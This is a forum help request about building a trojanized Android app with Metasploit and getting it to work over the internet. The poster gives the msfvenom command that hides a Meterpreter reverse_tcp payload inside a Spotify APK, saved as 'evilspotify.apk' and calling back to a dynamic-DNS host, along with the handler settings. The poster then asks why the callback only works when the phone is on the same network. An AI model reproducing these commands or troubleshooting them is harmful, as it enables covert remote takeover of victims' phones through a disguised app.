Help with Metasploit Attack Over WAN (Android)
I'm trying to do an attack over WAN but I'm having a few problems, this the procedure that I'm doing in this moment:
msfvenom -p android/meterpreter/reverse_tcp -x /root/Desktop/spotify.apk -k HOST=°°°°.ddns.net (Static Public IP) LPORT=4444 -o /root/Desktop/TrojanWAN/apk/evilspotify.apk
While, into the Meterpreter console I put this:
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST °°°°.ddns.net (Same for the Payload)
set LPORT 4444
set ReverseListnerBindAddress 192.168.0.14 (Static local IP)
When I start to listen this is the result:
I think I've opened correctly the port 4444:
When I check with canyouseeme.org, if the console is listening the port result opened while If the console isn't, the port result closed, is it normal?
If the telephone is in the same network of the attacker's machine I can listen it, but if it is connected to another wifi I can listen it, where is the problem?